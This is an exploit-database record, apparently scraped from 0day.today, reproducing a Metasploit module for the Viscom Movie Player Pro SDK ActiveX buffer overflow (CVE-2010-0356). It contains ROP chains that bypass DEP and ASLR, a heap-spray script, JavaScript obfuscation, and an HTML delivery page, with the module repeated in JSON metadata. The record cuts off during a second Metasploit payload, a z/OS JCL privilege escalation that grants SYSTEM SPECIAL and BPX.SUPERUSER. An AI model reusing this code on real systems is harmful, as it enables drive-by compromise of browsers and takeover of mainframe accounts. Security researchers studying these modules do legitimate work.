ID 1337DAY-ID-16838 Type zdt Reporter metasploit Modified 2011-11-19T00:00:00
Description
Exploit for windows platform in category remote exploits
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',
'Description' => %q{
Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control
in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows
remote attackers to execute arbitrary code via a long strFontName parameter to the
DrawText method.
The victim will first be required to trust the publisher Viscom Software.
This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
with Java support.
},
'License' => MSF_LICENSE,
'Author' =>
[
'shinnai', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2010-0356' ],
[ 'OSVDB', '61634' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows IE6-7', {} ],
[ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
],
'DisclosureDate' => 'Jan 12 2010',
'DefaultTarget' => 0))
register_options(
[ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
end
# Prevent module from being executed in autopwn
def autofilter
false
end
def check_dependencies
use_zlib
end
def junk(n=4)
return rand_text_alpha(n).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
# Set target manually or automatically
my_target = target
if my_target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
my_target = targets[1] # XP
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
my_target = targets[1] # XP
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # XP
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
my_target = targets[1] # Vista
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # Vista
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # Win7
end
end
sploit = rand_text_alpha(32)
pivot_addr = 0x1126cfe4
if my_target.name =~ /IE8/
pivot_rop =
[ # Pivot to get to ROP Chain
0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]
pivot_addr,
0x10014361, # MOV ESP,EBP # POP EBP # RETN 08 ** [MOVIEP~1.OCX]
junk, # ---------------------^
junk, # ----------------------^
junk, # ----------------------^
junk, # -------------------------------------^
junk, # -------------------------------------^
0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]
].pack("V*")
sploit << pivot_rop
code = [0x7C347F98].pack("V") * 4 # RETN (ROP NOP) [MSVCR71.dll]
code <<
[ # MSVCR71.dll - rop chain generated with mona.py
0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
0x7C347F98, # RETN (ROP NOP)
0x7C3415A2, # JMP [EAX]
0xFFFFFFFF, #
0x7C376402, # Skip 4 bytes
0x7C351E05, # NEG EAX # RETN
0x7C345255, # INC EBX # FPATAN # RETN
0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7C344F87, # POP EDX # RETN
0xFFFFFFC0, # Value to negate, will become 0x00000040
0x7C351EB1, # NEG EDX # RETN
0x7C34D201, # POP ECX # RETN
0x7C38B001, # &Writable location
0x7C347F97, # POP EAX # RETN
0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
0x7C345C30, # Ptr to 'push esp' # ret
].pack("V*")
code << payload.encoded
else
code = payload.encoded
sploit << [pivot_addr].pack('V*')
end
# Payload in JS format
code = Rex::Text.to_unescape(code)
spray = <<-JS
var heap_lib = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x800-0x20);
var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x7fb00-6)/2);
heap_lib.gc();
for (var i = 0; i < 0x200; i++) {
heap_lib.alloc(block);
}
JS
# Use heaplib
js = heaplib(spray)
# Obfuscate on demand
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
# Randomize the javascript variable names
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
html = %Q|<html>
<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>
<script>#{js}</script>
<script language='vbscript'>
#{strname} = "#{sploit}"
#{vname}.DrawText 1, 1, 1, "", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, html)
end
end
=begin
(78c.1d8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4
eip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
41414141 ?? ???
0:005> dd @esp
0203f300 41414141 41414141 41414141 41414141
0203f310 41414141 41414141 41414141 41414141
0203f320 41414141 41414141 41414141 41414141
0203f330 41414141 41414141 41414141 41414141
0203f340 41414141 41414141 41414141 41414141
0203f350 41414141 41414141 41414141 41414141
0203f360 41414141 41414141 41414141 41414141
0203f370 41414141 41414141 41414141 41414141
=end
# 0day.today [2018-04-10] #
{"hash": "987aabbcb53142e9207c1cdf2ba9ec50f1e11697805447413fd035d3bbf1a0dd", "id": "1337DAY-ID-16838", "lastseen": "2018-04-10T04:24:25", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "8b36cc3e59bb3fd4cff37af5066c3110", "key": "href"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "modified"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "4f422d511ffe87a25f47e0a53caa4a02", "key": "sourceData"}, {"hash": "0a6d4fc673ec2975f1dd45edf8f37624", "key": "sourceHref"}, {"hash": "9c82500befb1b39c56a3fdca4d21666a", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-04-10T04:24:25"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-12320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7633", "SECURITYVULNS:DOC:16838"]}], "modified": "2018-04-10T04:24:25"}, "vulnersScore": 0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16838", "description": "Exploit for windows platform in category remote exploits", "title": "Viscom Software Movie Player Pro SDK ActiveX 6.8", "history": [{"bulletin": {"hash": "2ab85803ce08ff85ac4f2dad5cf70908e348a0b59c76c0b1575bba76b1110882", "id": "1337DAY-ID-16838", "lastseen": "2016-04-20T01:53:47", "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2016-04-20T01:53:47"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "9d5390eade0a6839ad0ce1aa741d1283", "key": "sourceHref"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f65b21aeb7ace81f430508af48644d33", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d15ae67001b5ada74d249942007b8d65", "key": "href"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "published"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "modified"}, {"hash": "9c82500befb1b39c56a3fdca4d21666a", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16838", "description": "Exploit for windows platform in category remote exploits", "viewCount": 0, "title": "Viscom Software Movie Player Pro SDK ActiveX 6.8", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',\r\n 'Description' => %q{\r\n Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\r\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\r\n remote attackers to execute arbitrary code via a long strFontName parameter to the\r\n DrawText method.\r\n \r\n The victim will first be required to trust the publisher Viscom Software.\r\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\r\n with Java support.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'shinnai', # Vulnerability discovery and original exploit\r\n 'TecR0c', # Metasploit module\r\n 'mr_me' # Metasploit module\r\n ],\r\n 'Version' => '$Revision: $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-0356' ],\r\n [ 'OSVDB', '61634' ],\r\n [ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'DisablePayloadHandler' => 'false',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'Windows IE6-7', {} ],\r\n [ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]\r\n ],\r\n 'DisclosureDate' => 'Jan 12 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)\r\n end\r\n \r\n # Prevent module from being executed in autopwn\r\n def autofilter\r\n false\r\n end\r\n \r\n def check_dependencies\r\n use_zlib\r\n end\r\n \r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"L\")[0].to_i\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n \r\n # Set target manually or automatically\r\n my_target = target\r\n if my_target.name == 'Automatic'\r\n agent = request.headers['User-Agent']\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # XP\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # Vista\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Vista\r\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Win7\r\n end\r\n end\r\n \r\n sploit = rand_text_alpha(32)\r\n \r\n pivot_addr = 0x1126cfe4\r\n \r\n if my_target.name =~ /IE8/\r\n \r\n pivot_rop =\r\n [ # Pivot to get to ROP Chain\r\n 0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]\r\n pivot_addr,\r\n 0x10014361, # MOV ESP,EBP # POP EBP # RETN 08 ** [MOVIEP~1.OCX]\r\n junk, # ---------------------^\r\n junk, # ----------------------^\r\n junk, # ----------------------^\r\n junk, # -------------------------------------^\r\n junk, # -------------------------------------^\r\n 0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]\r\n ].pack(\"V*\")\r\n \r\n sploit << pivot_rop\r\n \r\n code = [0x7C347F98].pack(\"V\") * 4 # RETN (ROP NOP) [MSVCR71.dll]\r\n \r\n code <<\r\n [ # MSVCR71.dll - rop chain generated with mona.py\r\n 0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n 0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)\r\n 0x7C347F98, # RETN (ROP NOP)\r\n 0x7C3415A2, # JMP [EAX]\r\n 0xFFFFFFFF, #\r\n 0x7C376402, # Skip 4 bytes\r\n 0x7C351E05, # NEG EAX # RETN\r\n 0x7C345255, # INC EBX # FPATAN # RETN\r\n 0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN\r\n 0x7C344F87, # POP EDX # RETN\r\n 0xFFFFFFC0, # Value to negate, will become 0x00000040\r\n 0x7C351EB1, # NEG EDX # RETN\r\n 0x7C34D201, # POP ECX # RETN\r\n 0x7C38B001, # &Writable location\r\n 0x7C347F97, # POP EAX # RETN\r\n 0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF\r\n 0x7C378C81, # PUSHAD # ADD AL,0EF # RETN\r\n 0x7C345C30, # Ptr to 'push esp' # ret\r\n ].pack(\"V*\")\r\n \r\n code << payload.encoded\r\n else\r\n code = payload.encoded\r\n sploit << [pivot_addr].pack('V*')\r\n end\r\n \r\n # Payload in JS format\r\n code = Rex::Text.to_unescape(code)\r\n \r\n spray = <<-JS\r\n var heap_lib = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{code}\");\r\n var nops = unescape(\"%u0c0c%u0c0c\");\r\n \r\n while (nops.length < 0x2000) nops += nops;\r\n var offset = nops.substring(0, 0x800-0x20);\r\n var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);\r\n \r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x7fb00-6)/2);\r\n \r\n heap_lib.gc();\r\n \r\n for (var i = 0; i < 0x200; i++) {\r\n heap_lib.alloc(block);\r\n }\r\n JS\r\n \r\n # Use heaplib\r\n js = heaplib(spray)\r\n \r\n # Obfuscate on demand\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n \r\n # Randomize the javascript variable names\r\n vname = rand_text_alpha(rand(100) + 1)\r\n strname = rand_text_alpha(rand(100) + 1)\r\n \r\n html = %Q|<html>\r\n<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>\r\n<script>#{js}</script>\r\n<script language='vbscript'>\r\n \r\n#{strname} = \"#{sploit}\"\r\n \r\n#{vname}.DrawText 1, 1, 1, \"\", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1\r\n \r\n</script>\r\n</html>\r\n|\r\n print_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n \r\n # Transmit the response to the client\r\n send_response_html(cli, html)\r\n end\r\n \r\nend\r\n=begin\r\n(78c.1d8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4\r\neip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\n41414141 ?? ???\r\n \r\n0:005> dd @esp\r\n0203f300 41414141 41414141 41414141 41414141\r\n0203f310 41414141 41414141 41414141 41414141\r\n0203f320 41414141 41414141 41414141 41414141\r\n0203f330 41414141 41414141 41414141 41414141\r\n0203f340 41414141 41414141 41414141 41414141\r\n0203f350 41414141 41414141 41414141 41414141\r\n0203f360 41414141 41414141 41414141 41414141\r\n0203f370 41414141 41414141 41414141 41414141\r\n=end\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-11-19T00:00:00", "references": [], "reporter": "metasploit", "modified": "2011-11-19T00:00:00", "href": "http://0day.today/exploit/description/16838"}, "lastseen": "2016-04-20T01:53:47", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',\r\n 'Description' => %q{\r\n Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\r\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\r\n remote attackers to execute arbitrary code via a long strFontName parameter to the\r\n DrawText method.\r\n \r\n The victim will first be required to trust the publisher Viscom Software.\r\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\r\n with Java support.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'shinnai', # Vulnerability discovery and original exploit\r\n 'TecR0c', # Metasploit module\r\n 'mr_me' # Metasploit module\r\n ],\r\n 'Version' => '$Revision: $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-0356' ],\r\n [ 'OSVDB', '61634' ],\r\n [ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'DisablePayloadHandler' => 'false',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'Windows IE6-7', {} ],\r\n [ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]\r\n ],\r\n 'DisclosureDate' => 'Jan 12 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)\r\n end\r\n \r\n # Prevent module from being executed in autopwn\r\n def autofilter\r\n false\r\n end\r\n \r\n def check_dependencies\r\n use_zlib\r\n end\r\n \r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"L\")[0].to_i\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n \r\n # Set target manually or automatically\r\n my_target = target\r\n if my_target.name == 'Automatic'\r\n agent = request.headers['User-Agent']\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # XP\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # Vista\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Vista\r\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Win7\r\n end\r\n end\r\n \r\n sploit = rand_text_alpha(32)\r\n \r\n pivot_addr = 0x1126cfe4\r\n \r\n if my_target.name =~ /IE8/\r\n \r\n pivot_rop =\r\n [ # Pivot to get to ROP Chain\r\n 0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]\r\n pivot_addr,\r\n 0x10014361, # MOV ESP,EBP # POP EBP # RETN 08 ** [MOVIEP~1.OCX]\r\n junk, # ---------------------^\r\n junk, # ----------------------^\r\n junk, # ----------------------^\r\n junk, # -------------------------------------^\r\n junk, # -------------------------------------^\r\n 0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]\r\n ].pack(\"V*\")\r\n \r\n sploit << pivot_rop\r\n \r\n code = [0x7C347F98].pack(\"V\") * 4 # RETN (ROP NOP) [MSVCR71.dll]\r\n \r\n code <<\r\n [ # MSVCR71.dll - rop chain generated with mona.py\r\n 0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n 0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)\r\n 0x7C347F98, # RETN (ROP NOP)\r\n 0x7C3415A2, # JMP [EAX]\r\n 0xFFFFFFFF, #\r\n 0x7C376402, # Skip 4 bytes\r\n 0x7C351E05, # NEG EAX # RETN\r\n 0x7C345255, # INC EBX # FPATAN # RETN\r\n 0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN\r\n 0x7C344F87, # POP EDX # RETN\r\n 0xFFFFFFC0, # Value to negate, will become 0x00000040\r\n 0x7C351EB1, # NEG EDX # RETN\r\n 0x7C34D201, # POP ECX # RETN\r\n 0x7C38B001, # &Writable location\r\n 0x7C347F97, # POP EAX # RETN\r\n 0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF\r\n 0x7C378C81, # PUSHAD # ADD AL,0EF # RETN\r\n 0x7C345C30, # Ptr to 'push esp' # ret\r\n ].pack(\"V*\")\r\n \r\n code << payload.encoded\r\n else\r\n code = payload.encoded\r\n sploit << [pivot_addr].pack('V*')\r\n end\r\n \r\n # Payload in JS format\r\n code = Rex::Text.to_unescape(code)\r\n \r\n spray = <<-JS\r\n var heap_lib = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{code}\");\r\n var nops = unescape(\"%u0c0c%u0c0c\");\r\n \r\n while (nops.length < 0x2000) nops += nops;\r\n var offset = nops.substring(0, 0x800-0x20);\r\n var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);\r\n \r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x7fb00-6)/2);\r\n \r\n heap_lib.gc();\r\n \r\n for (var i = 0; i < 0x200; i++) {\r\n heap_lib.alloc(block);\r\n }\r\n JS\r\n \r\n # Use heaplib\r\n js = heaplib(spray)\r\n \r\n # Obfuscate on demand\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n \r\n # Randomize the javascript variable names\r\n vname = rand_text_alpha(rand(100) + 1)\r\n strname = rand_text_alpha(rand(100) + 1)\r\n \r\n html = %Q|<html>\r\n<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>\r\n<script>#{js}</script>\r\n<script language='vbscript'>\r\n \r\n#{strname} = \"#{sploit}\"\r\n \r\n#{vname}.DrawText 1, 1, 1, \"\", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1\r\n \r\n</script>\r\n</html>\r\n|\r\n print_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n \r\n # Transmit the response to the client\r\n send_response_html(cli, html)\r\n end\r\n \r\nend\r\n=begin\r\n(78c.1d8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4\r\neip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\n41414141 ?? ???\r\n \r\n0:005> dd @esp\r\n0203f300 41414141 41414141 41414141 41414141\r\n0203f310 41414141 41414141 41414141 41414141\r\n0203f320 41414141 41414141 41414141 41414141\r\n0203f330 41414141 41414141 41414141 41414141\r\n0203f340 41414141 41414141 41414141 41414141\r\n0203f350 41414141 41414141 41414141 41414141\r\n0203f360 41414141 41414141 41414141 41414141\r\n0203f370 41414141 41414141 41414141 41414141\r\n=end\r\n\r\n\n\n# 0day.today [2018-04-10] #", "published": "2011-11-19T00:00:00", "references": [], "reporter": "metasploit", "modified": "2011-11-19T00:00:00", "href": "https://0day.today/exploit/description/16838"}
{"metasploit": [{"lastseen": "2019-11-24T21:38:14", "bulletinFamily": "exploit", "description": "(Elevate privileges for user. Adds SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using an unsecured/updateable APF authorized library (APFLIB) and updating the user's ACEE using this program/library. Note: This privesc only works with z/OS systems using RACF, no other ESM is supported.)\n", "modified": "2019-04-30T17:15:47", "published": "2017-04-11T19:10:33", "id": "MSF:PAYLOAD/CMD/MAINFRAME/APF_PRIVESC_JCL", "href": "", "type": "metasploit", "title": "JCL to Escalate Privileges", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This is a JCL command payload for z/OS - mainframe.\n# It will escalate privileges of an account on the system if the user\n# can identify a writable APF authorised library \"APFLIB\"\n#\n# See https://www.ibm.com/support/knowledgecenter/zosbasics/com.ibm.zos.zsecurity/zsecc_060.htm\n# for more information on APF Authorized Libraries\n#\n# Thank you to Ayoub & The Brummie for the assembler ideas.\n#\n# To-do (BeS 4/11/17)\n# Add options for privileges that can be added.\n# Auto scan for writable APF authorized library.\n##\n\nrequire 'msf/core/handler/find_shell'\nrequire 'msf/base/sessions/mainframe_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n CachedSize = 3156\n include Msf::Payload::Single\n include Msf::Payload::Mainframe\n\n def initialize(info = {})\n super(merge_info(\n info,\n 'Name' => 'JCL to Escalate Privileges',\n 'Description' => %q{(Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.)},\n 'Author' =>\n [\n 'Bigendian Smalls',\n 'Ayoub'\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'mainframe',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::None,\n 'Session' => Msf::Sessions::MainframeShell,\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'jcl',\n 'Payload' =>\n {\n 'Offsets' => {},\n 'Payload' => ''\n }\n ))\n register_options(\n [\n Opt::RPORT(21),\n OptString.new('ACTNUM', [true, \"Accounting info for JCL JOB card\", \"MSFUSER-ACCTING-INFO\"]),\n OptString.new('PGMNAME', [true, \"Programmer name for JCL JOB card\", \"programmer name\"]),\n OptString.new('JCLASS', [true, \"Job Class for JCL JOB card\", \"A\"]),\n OptString.new('NOTIFY', [false, \"Notify User for JCL JOB card\", \"\"]),\n OptString.new('MSGCLASS', [true, \"Message Class for JCL JOB card\", \"Z\"]),\n OptString.new('MSGLEVEL', [true, \"Message Level for JCL JOB card\", \"(0,0)\"]),\n OptString.new('APFLIB', [true, \"APF Authorized Library to use\", \"SYS1.LINKLIB\"])\n ],\n self.class\n )\n register_advanced_options(\n [\n OptBool.new('NTFYUSR', [true, \"Include NOTIFY Parm?\", false]),\n OptString.new('JOBNAME', [true, \"Job name for JCL JOB card\", \"DUMMY\"])\n ],\n self.class\n )\n end\n\n ##\n # Construct Payload\n ##\n def generate\n super + command_string\n end\n\n ##\n # Setup replacement vars from options if need be\n ##\n def command_string\n jcl_jobcard +\n \"//S1 EXEC ASMACLG,PARM.L='AC(1)'\\n\" \\\n \"//C.SYSLIB DD DSN=SYS1.SISTMAC1,DISP=SHR\\n\" \\\n \"// DD DSN=SYS1.MACLIB,DISP=SHR\\n\" \\\n \"//L.SYSLMOD DD DISP=SHR,DSN=#{datastore['APFLIB']}(APFPRIV)\\n\" \\\n \"//C.SYSIN DD *,DLM=ZZ\\n\" \\\n 